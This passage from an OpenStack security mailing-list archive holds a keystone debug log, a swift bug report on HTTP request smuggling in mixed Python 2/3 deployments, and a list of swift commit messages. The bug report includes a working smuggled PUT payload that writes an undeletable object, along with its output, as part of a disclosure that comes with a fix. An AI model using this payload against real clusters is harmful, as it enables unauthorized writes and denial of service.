Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, pro ject=None, project_domain=None, quote_mode='nonnumeric', role=u'member', role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:50.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["2nu0u-1wQRmWA9_uS2hZ-g"], "issued_at": "2019-10-04T18:56:50.000000 Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles/member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: 
{SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles/member HTTP/1.1" 404 84 RESP: [404] Connection: close Content-Length: 84 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-88bce424-60f2-4d2a-a6f5-2bd256602789 RESP BODY: {"error":{"code":404,"message":"Could not find role: member.","title":"Not Found"}} GET call to identity for http://10.0.3.122/identity/v3/roles/member used request id req-88bce424-60f2-4d2a-a6f5-2bd256602789 Request returned failure status: 404 REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles?name=member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles?name=member HTTP/1.1" 200 322 RESP: [200] Connection: close Content-Length: 322 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-ce429b68-b53d-4c49-9080-ed3da3bce55b RESP BODY: {"links": {"self": "http://10.0.3.122/identity/v3/roles?name=member", "previous": null, "next": null}, "roles": [{"description": null, "links": {"self": "http://10.0.3.122/identity/v3/roles/a8cd98f2e98d4135b2fa83950d6171ec"}, " options": {}, "id": "a8cd98f2e98d4135b2fa83950d6171ec", "domain_id": null, "name": "member"}]} GET call to identity for http://10.0.3.122/identity/v3/roles?name=member used request id req-ce429b68-b53d-4c49-9080-ed3da3bce55b REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA 256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True HTTP/1.1" 200 1328 RESP: [200] Connection: close Content-Length: 1328 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-08f9bdb9-149d-4905-96cc-99b87c8b6339 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e" , "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba74 7046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914 e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id":  "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": 
"http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}], "links": {"self": "http://10. 0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True used request id req-08f9bdb9-149d-4905-96cc-99b87c8b6339 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | reader | | system-auditors at Default | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1846817/+subscriptions From 1840507 at bugs.launchpad.net Sat Oct 5 04:04:41 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Sat, 05 Oct 2019 04:04:41 -0000 Subject: [Openstack-security] [Bug 1840507] Fix proposed to swift (feature/losf) References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <157024828138.22579.14176622263054177134.malone@gac.canonical.com> Fix proposed to branch: feature/losf Review: https://review.opendev.org/686864 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. 
Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. 
As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1840507 at bugs.launchpad.net Sat Oct 5 05:38:54 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Sat, 05 Oct 2019 05:38:54 -0000 Subject: [Openstack-security] [Bug 1840507] Re: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <157025393478.1047.7914861800521921871.malone@chaenomeles.canonical.com> Reviewed: https://review.opendev.org/686864 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=bfa8e9feb51f2b10adfec3a741661a76fcf73216 Submitter: Zuul Branch: feature/losf commit cb76e00e90aea834c8f3dd8a6ca5131acd43663b Author: OpenStack Proposal Bot Date: Fri Oct 4 07:05:07 2019 +0000 Imported Translations from Zanata For more information about this automatic import see: https://docs.openstack.org/i18n/latest/reviewing-translation-import.html Change-Id: I40ce1d36f1c207a0d3e99a3a84a162b21b3c57cf commit 527a57ffcdefc03a5080b07d63f0ded319e08dfe Author: OpenStack Release Bot Date: Thu Oct 3 16:35:36 2019 +0000 Update master for stable/train Add file to the reno documentation build to show release notes for stable/train. Use pbr instruction to increment the minor version number automatically so that master versions are higher than the versions on stable/train. Change-Id: Ia93e0b690f47c6231423a25dfd6a108a60378a21 Sem-Ver: feature commit 8a4becb12fbe3d4988ddee73536673d6f55682dd Author: Tim Burke Date: Fri Sep 27 15:18:59 2019 -0700 Authors/changelog for 2.23.0 Also, make some CHANGELOG formatting more consistent. Change-Id: I380ee50e075a8676590e755f24a3fd7a7a331029 commit bf9346d88de2aeb06da3b2cde62ffa6200936367 Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 Fix some request-smuggling vectors on py3 A Python 3 bug causes us to abort header parsing in some cases. We mostly worked around that in the related change, but that was *after* eventlet used the parsed headers to determine things like message framing. As a result, a client sending a malformed request (for example, sending both Content-Length *and* Transfer-Encoding: chunked headers) might have that request parsed properly and authorized by a proxy-server running Python 2, but the proxy-to-backend request could get misparsed if the backend is running Python 3. As a result, the single client request could be interpretted as multiple requests by an object server, only the first of which was properly authorized at the proxy. 
Now, after we find and parse additional headers that weren't parsed by Python, fix up eventlet's wsgi.input to reflect the message framing we expect given the complete set of headers. As an added precaution, if the client included Transfer-Encoding: chunked *and* a Content-Length, ensure that the Content-Length is not forwarded to the backend. Change-Id: I70c125df70b2a703de44662adc66f740cc79c7a9 Related-Change: I0f03c211f35a9a49e047a5718a9907b515ca88d7 Closes-Bug: 1840507 commit 0217b12b6d7d6f3727a54db65614ff1ef52d6286 Author: Matthew Oliver Date: Wed Sep 4 14:30:33 2019 +1000 PDF Documentation Build tox target This patch adds a `pdf-docs` tox target that will build PDF versions of our docs. As per the Train community goal: https://governance.openstack.org/tc/goals/selected/train/pdf-doc-generation.html Add sphinxcontrib-svg2pdfconverter to doc/requirements.txt to convert our SVGs. Story: 2006122 Task: 35515 Change-Id: I26cefda80d3234df68d7152b404e0a71da74ab90 commit be41721888913320bd448b8aaa4539f3ac6d4e7c Author: Tim Burke Date: Fri Sep 27 16:18:00 2019 -0700 Add experimental job to test upgrades from stein Also, correct the version that we check out when upgrading from stable branches. Change-Id: Ie733bc50466c66d6e6eb5c6bd42e42a05ef88798 commit 9a33365f064c2fbde732780982e3d324b488e677 Author: Tim Burke Date: Fri Sep 27 11:04:43 2019 -0700 py3: Allow percentages in configs Previously, configs like fallocate_reserve = 1% would cause a py3 backend server to fail to start, complaining like configparser.InterpolationSyntaxError: Error in file /etc/swift/object-server/1.conf.d: '%' must be followed by '%' or '(', found: '%' This could also come up in proxy-server configs, with things like percent signs in tempauth password. In general, we haven't really thought much about interpolation in configs. Python's default ConfigParser has always supported it, though, so we got it "for free". On py2, we didn't really have to think about it, since values like "1%" would pass through just fine. (It would blow up a SafeConfigParser, but a normal ConfigParser only does replacements when there's something like a "%(opt)s" in the value.) On py3, SafeConfigParser became ConfigParser, and the old interpolation mode (AFAICT) doesn't exist. Unfortunatley, since we "supported" interpolation, we have to assume there are deployments in the wild that use it, and try not to break them. So, do what we can to mimic the py2 behavior. Change-Id: I0f9cecd11f00b522a8486972551cb30af151ce32 Closes-Bug: #1844368 commit ad7f7da32d6f90aa49873f1021d18cd54daef102 Author: Tim Burke Date: Mon Aug 5 14:51:14 2019 -0700 py3: decode stdout from backgrounded servers Otherwise, when we go to print() it, we get a bunch of b"" strings. Change-Id: If62da0b4b34b9d1396b5838bf79ff494679f1ae3 commit e9cd9f74a5264f396783ca2a4548a3da7cee7bff Author: Matthew Oliver Date: Mon Aug 12 16:16:17 2019 +1000 sharder: Keep cleaving on empty shard ranges When a container is being cleaved there is a possiblity that we're dealing with an empty or near empty container created on a handoff node. These containers may have a valid list of shard ranges, so would need to cleave to the new shards. Currently, when using a `cleave_batch_size` that is smaller then the number of shard ranges on the cleaving container, these containers will have to take a few shard passes to shard, even though there maybe nothing in them. This is worse if a really large container is sharding, and due to being slow, error limitted a node causing a new container on a handoff location. 
This empty container would have a large number of shard ranges and could take a _very_ long time to shard away, slowing the process down. This patch eliminates the issue by detecting when no objects are returned for a shard range. The `_cleave_shard_range` method now returns 3 possible results: - CLEAVE_SUCCESS - CLEAVE_FAILED - CLEAVE_EMPTY They all are pretty self explanitory. When `CLEAVE_EMPTY` is returned the code will: - Log - Not replicate the empty temp shard container sitting in a handoff location - Not count the shard range in the `cleave_batch_size` count - Update the cleaving context so sharding can move forward If there already is a shard range DB existing on a handoff node to use then the sharder wont skip it, even if there are no objects, it'll replicate it and treat it as normal, including using a `cleave_batch_size` slot. Change-Id: Id338f6c3187f93454bcdf025a32a073284a4a159 Closes-Bug: #1839355 commit f56071e57392573b7aea014bba6757a01a8a59ad Author: Clay Gerrard Date: Wed Sep 25 15:58:50 2019 -0500 Make sharding methods with only one job Change-Id: Id1e9a9ee316517923907bf0593e851448528c75c commit 50255de0e3def868e958bfdf4aea9f4cc606e744 Author: Tim Burke Date: Mon Sep 23 16:21:36 2019 -0700 func tests: Add more UTF8 tests for versioning Change-Id: I7ac111bd8b57bd21c37f4c567a20e2c12957b2ff commit 6271d88f9ed5e98f989a6739a75b268537fe0521 Author: Thiago da Silva Date: Fri Aug 23 19:14:37 2019 +0200 Add func test for changing versionining modes Users are able to change versioning in a container from X-Versions-Location to X-History-Location, which affects how DELETEs are handled. We have some unit tests that check this behavior, but no functional tests. This patch adds a functional test that helps us understand and document how changing modes affects the handling of DELETE requests. Change-Id: I5dbe5bdca17e624963cb3a3daba3b240cbb4bec4 commit 9495bc0003817805750dd78f3d93dd1a237f1553 Author: Tim Burke Date: Thu Sep 19 16:52:41 2019 -0700 sharding: Update probe test to verify CleavingContext cleanup Change-Id: I219bbbfd6a3c7adcaf73f3ee14d71aadd183633b Related-Change: I1e502c328be16fca5f1cca2186b27a0545fecc16 commit 370ac4cd70489a49b2b6408638c9b35006f57053 Author: Matthew Oliver Date: Sat Sep 21 16:06:24 2019 +1000 Sharding: Use the metadata timestamp as last_modified This is a follow up patch from the cleaning up cleave context's patch (patch 681970). Instead of tracking a last_modified timestamp, and storing it in the context metadata, use the timestamp we use when storing any metadata. Reducing duplication is nice, but there's a more significant reason to do this: affected container DBs can start getting cleaned up as soon as they're running the new code rather than needing to wait for an additional reclaim_age. Change-Id: I2cdbe11f06ffb5574e573c4a60ba4e5d41a00c50 commit 291873e784aeac30c2adcaaaca6ab43c2393b289 Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 proxy: Don't trust Content-Length for chunked transfers Previously we'd - complain that a client disconnected even though they finished their chunked transfer just fine, and - on EC, send a X-Backend-Obj-Content-Length for pre-allocation even though Content-Length doesn't determine request body size. 
Change-Id: Ia80e595f713695cbb41dab575963f2cb9bebfa09 Related-Bug: 1840507 commit 81a41da5420313f9cdb9c759bbb0f46c0d20c5af Author: Matthew Oliver Date: Fri Sep 13 16:16:06 2019 +1000 Sharding: Clean up old CleaveConext's during audit There is a sharding edge case where more CleaveContext are generated and stored in the sharding container DB. If this number get's high enough, like in the linked bug. If enough CleaveContects build up in the DB then this can lead to the 503's when attempting to list the container due to all the `X-Container-Sysmeta-Shard-Context-*` headers. This patch resolves this by tracking the a CleaveContext's last modified. And during the sharding audit, any context's that hasn't been touched after reclaim_age are deleted. This plus the skip empty ranges patches should improve these handoff shards. Change-Id: I1e502c328be16fca5f1cca2186b27a0545fecc16 Closes-Bug: #1843313 commit 20fc16e8daa184ebadab9f49e0f76e7687a8cebd Author: Thiago da Silva Date: Tue Sep 17 18:57:35 2019 +0200 Close leaking opened requests Change-Id: I3d96022c01834c85e9795ea41d18b17624a33a19 Co-Authored-By: Tim Burke commit 9698b1bb957c1f646ac30fb64ec3528627fcee1c Author: Thiago da Silva Date: Tue Sep 17 16:52:55 2019 +0200 Skip test when object versioning is not enabled Change-Id: I671a6e4a3d1011dbbc2267b44134cfaf3380fb22 commit 75c9c636f2c637b0f36c705957f2204de6e405d0 Author: Ghanshyam Mann Date: Tue Sep 17 04:47:45 2019 +0000 [train][goal] Run 'tempest-ipv6-only' job in gate As part of Train community goal 'Support IPv6-Only Deployments and Testing'[1], Tempest has defined the new job 'tempest-ipv6-only'(adding in Depends-On patch) which will deploy services on IPv6 and run smoke tests and IPv6 related tests present in Tempest. This job will be part of Nova, Neutron, Cinder, Keystone, Glance, Swift gate. Verification structure will be: - 'devstack-IPv6' deploy the service on IPv6 - 'devstack-tempest-ipv6' run will verify the IPv6-only setting and listen address - 'tempest-ipv6-only' will run the smoke + IPv6 related test case. This commit adds the new job 'tempest-ipv6-only' run on gate. Story: #2005477 Task: #35932 [1] https://governance.openstack.org/tc/goals/train/ipv6-support-and-testing.html Change-Id: I78be2ee5a7f1e5d3188ece98d7d8324f1c9bd0e3 commit b4288b4aa6e6be2222f5f0e9ca8360c07040d5c0 Author: Nguyen Quoc Viet Date: Thu Sep 12 11:31:42 2019 +0700 versioned_writes: checks for SLO object before copy Previously, versioned_writes middleware copy an already existing object using PUT. However, SLO requires the additional query to properly update the object size when listing. Propose fix: In _put_versioned_obj - which is called when on creating version obj and also on restoring obj, if 'X-Object-Sysmeta-Slo-Size' header is present it will add needed headers for container to update obj size Added a new functional test case with size assertion for slo Change-Id: I47e0663e67daea8f1cf4eaf3c47e7c8429fd81bc Closes-Bug: #1840322 commit db8b0b6bc46a67b03af415d4e5e1429cc7d73bba Author: Clay Gerrard Date: Fri May 10 13:15:42 2019 -0500 Make ceph tests more portable Change-Id: If93325f2651a02f98f9d480c10bf7b849cc9617e commit 3960df983b68cd5baa84cac9a4d0b61f08737c09 Author: Andreas Jaeger Date: Fri Sep 13 09:38:22 2019 +0200 Remove unneeded Zuul branch matcher We have implicit branch matchers, so there's no need to add a check for not-ocata etc, a job is only run for the branch it's on - like master now. Remove it to not confuse Zuul when multiple branches matches and the job definition is different. 
Change-Id: I6a346c9141aad1aa8a7393c899d5571057073e7a commit 49f62f6ab7fd1b833e9b5bfbcaafa4b45b592d34 Author: Tim Burke Date: Thu Sep 12 10:59:08 2019 -0700 bufferedhttp: ensure query params are properly quoted Recent versions of py27 [1] have begun raising InvalidURL if you try to include non-ASCII characters in the request path. This was observed recently in the periodic checks of stable/ocata and stable/pike. In particular, we would spin up some in-process servers in test.unit.proxy.test_server.TestSocketObjectVersions and do a container listing with a prefix param that included raw (unquoted) UTF-8. This query string would pass unmolested through the proxy, tripping the InvalidURL error when bufferedhttp called putrequest. More recent versions of Swift would not exhibit this particular failure, as the listing_formats middleware would force a decoding/re-encoding of the query string for account and container requests. However, object requests with errant query strings would likely be able to trip the same error. Swift on py3 should not exhibit this behavior, as we so thoroughly re-write the request line to avoid hitting https://bugs.python.org/issue33973. Now, always parse and re-encode the query string in bufferedhttp. This prevents any errors on object requests and cleans up any callers that might use bufferedhttp directly. [1] Anything after https://github.com/python/cpython/commit/bb8071a; see https://bugs.python.org/issue30458 Closes-Bug: 1843816 Change-Id: I73f84b96f164e6fc5d3cb890355871c26ed271a6 Related-Change: Id3ce37aa0402e2d8dd5784ce329d7cb4fbaf700d Related-Change: Ie648f5c04d4415f3b620fb196fa567ce7575d522 commit 1ded0d6c8793ca3eca573c098cef78b5ae41f080 Author: Tim Burke Date: Thu Oct 11 15:23:39 2018 -0700 Allow arbitrary UTF-8 strings as delimiters in listings AWS seems to support this, so let's allow s3api to do it, too. Previously, S3 clients trying to use multi-character delimiters would get 500s back, because s3api didn't know how to handle the 412s that the container server would send. As long as we're adding support for container listings, may as well do it for accounts, too. Change-Id: I62032ddd50a3493b8b99a40fb48d840ac763d0e7 Co-Authored-By: Thiago da Silva Closes-Bug: #1797305 commit 4cafc3d656098d13c46cd83d94b44c8801c5eb2b Author: CY Chiang Date: Thu Sep 5 16:09:23 2019 +0800 doc: Fix the swift middleware doc needs more info to set s3 api Modify the AWS S3 Api section in middleware document. Add how to create ec2 credential and minimun configuration to use s3 api. Change-Id: Id4d614d8297662f16403fdfe526e14714a21249d Closes-Bug: #1842884 commit 1d7e1558b3b422073918b89df21f703215bd1e33 Author: Tim Burke Date: Tue Jul 16 17:01:19 2019 -0700 py3: (mostly) port probe tests There's still one problem, though: since swiftclient on py3 doesn't support non-ASCII characters in metadata names, none of the tests in TestReconstructorRebuildUTF8 will pass. Change-Id: I4ec879ade534e09c3a625414d8aa1f16fd600fa4 commit c71bb2506310438b011818a44449daea500863fd Author: Tim Burke Date: Fri Aug 30 21:40:03 2019 -0700 diskfile: Add some argument validation Either all or none of account, container, and object should be provided. If we get some but not all, that's indicating some kind of a coding bug; there's a chance it may be benign, but it seems safer to fail early and loudly. 
Change-Id: Ia9a0ac28bde4b5dcbf6e979c131e61297577c120 Related-Change: Ic2e29474505426dea77e178bf94d891f150d851b commit e6e31410e093b426bfa5b9a2094be56c8406b6a2 Author: Tim Burke Date: Fri Aug 30 11:54:47 2019 -0700 Find .d pid files with swift-orphans Change-Id: I7a2f19862817abf15e51463bd124293730451602 commit 3e4efb7aa4662a5f915caab5bef3de6dd17e3e19 Author: Tim Burke Date: Thu Aug 29 16:55:27 2019 -0700 py3: Update Getting Started docs Change-Id: I94050c40585b397a9f7bab1e48650b89f70ab24d commit 4d83b9b95e32038390dbdc66d93c36c929dbce2a Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 tests/py3: Improve header casing Previously, our unit tests with socket servers would let eventlet capitalize headers on the way out, which - isn't something we want to have eventlet do, because it - breaks unicode-in-header-names on py3, so it - is already disabled in swift.common.wsgi.run_server() for real servers. Include a test to make sure we don't forget about it in the future. Change-Id: I0156d0059092ed414b296c65fb70fc18533b074a commit a32fb30c16062ea64488e918077d635645e33e47 Author: Ondřej Nový Date: Mon Aug 20 10:11:15 2018 +0200 Use SOURCE_DATE_EPOCH in docs to make build reproducible Set copyright year and html_last_updated_fmt to SOURCE_DATE_EPOCH if it's set. See https://reproducible-builds.org/specs/source-date-epoch/ This patch make build reproducible, see https://reproducible-builds.org/ Change-Id: I730a8265ca2c70c639ef77a613908e84eb738b70 commit 2545372055922abd681ef665f9040590d2f5806c Author: Tim Burke Date: Fri Aug 16 20:37:10 2019 -0700 py3: Switch swift-dsvm-functional-py3 to run tests under py3 Now that all of the func tests are ported, we may as well run all-py3. Change-Id: Ib9f75ca9efb46dc4c7730ad2718228ec7777c924 commit 74db3670607d952e597011eb07676aedff521b41 Author: Tim Burke Date: Wed Aug 7 16:16:57 2019 -0700 py3: Finish porting func tests We were (indirectly) importing swiftclient (and therefore requests and urllib3) before doing our eventlet monkey-patching. This would lead boto3 (which digs an SSLContext out of urllib3) to trip RecursionErrors on py3 similar to >>> from ssl import SSLContext, PROTOCOL_SSLv23 >>> import eventlet >>> eventlet.monkey_patch(socket=True) >>> SSLContext(PROTOCOL_SSLv23).options |= 0 Traceback (most recent call last): File "", line 1, in File "/usr/lib/python3.6/ssl.py", line 465, in options super(SSLContext, SSLContext).options.__set__(self, value) File "/usr/lib/python3.6/ssl.py", line 465, in options super(SSLContext, SSLContext).options.__set__(self, value) File "/usr/lib/python3.6/ssl.py", line 465, in options super(SSLContext, SSLContext).options.__set__(self, value) [Previous line repeated 330 more times] RecursionError: maximum recursion depth exceeded while calling a Python object Change-Id: I4bb59edd87336597791416c4f2a096efe0e72fe3 commit 3750285bc863f8b6b56ba9526b028ee9cddcf04b Author: Tim Burke Date: Tue Jul 16 16:24:14 2019 -0700 py3: fix up listings on sharded containers We were playing a little fast & loose with types before; as a result, marker/end_marker weren't quite working right. In particular, we were checking whether a WSGI string was contained in a shard range, while ShardRange assumes all comparisons are against native strings. Now, get everything to native strings before making comparisons, and get them back to wsgi when we shove them in the params dict. 
Change-Id: Iddf9e089ef95dc709ab76dc58952a776246991fd commit a48dd1950d2999cb7fdc2856a827da4780715b1e Author: Tim Burke Date: Mon Aug 5 14:48:54 2019 -0700 Allow non-default domain to be used in func tests Change-Id: I7afa7e367103bb9caaf74788a49cd055eca53cf6 commit f1b44b199a064c3715c4b0e1e4067ec8235cf18d Author: Tim Burke Date: Fri Mar 29 13:54:30 2019 -0700 s3api: paginate listings when aborting MPUs Even when your cluster's configured funny, like your container_listing_limit is too low, or your max_manifest_segments and max_upload_part_num are too high, an abort should (attempt to) clean up *all* segments. Change-Id: I5a57f919cc74ddb08bbb35a7d852fbc1457185e8 commit c0035ed82e52756c9c04097fabba561a86da200a Author: CY Chiang Date: Tue Jul 30 11:42:45 2019 +0800 Update the bandit.yaml available tests list According to the bandit current version document, the B109 and B111 plugin has been removed. And Add the following tests: Complete Test Plugin Listing: B507, B610, B611, B703 Blacklist Plugins Listing: B322, B323, B325, B413, B414 Reference URL: https://bandit.readthedocs.io/en/latest/plugins/index.html Change-Id: I5e9365f9147776d7d90c6ba889acbde3c0e6c19d Closes-Bug: #1838361 commit 6853616aeaa7a6b14fd1ae99a507ab1761d16609 Author: Tim Burke Date: Fri Jul 12 15:17:34 2019 -0700 ring: Track more properties of the ring Plumb the version from the ringbuilder through to the metadata at the start of the ring. Recover this (if available) when running swift-ring-builder write_builder When we load the ring, track the count and MD5 of the bytes off disk, as well as the number of uncompressed bytes. Expose all this new information as properties on the Ring, along with - device_count (number of non-None entries in self._devs), - weighted_device_count (number of devices that have weight), and - assigned_device_count (number of devices that actually have partition assignments). Co-Authored-By: Matthew Oliver Change-Id: I73deaf6f1d9c1d37630c37c02c597b8812592351 commit 0fec28ab155276d099d1d4c9fd377f3da539077b Author: zhufl Date: Wed Jul 3 16:41:38 2019 +0800 Fix invalid assert states This is to fix invalid assert states like: self.assertTrue('sync_point2: 5', lines.pop().strip()) self.assertTrue('sync_point1: 5', lines.pop().strip()) self.assertTrue('bytes: 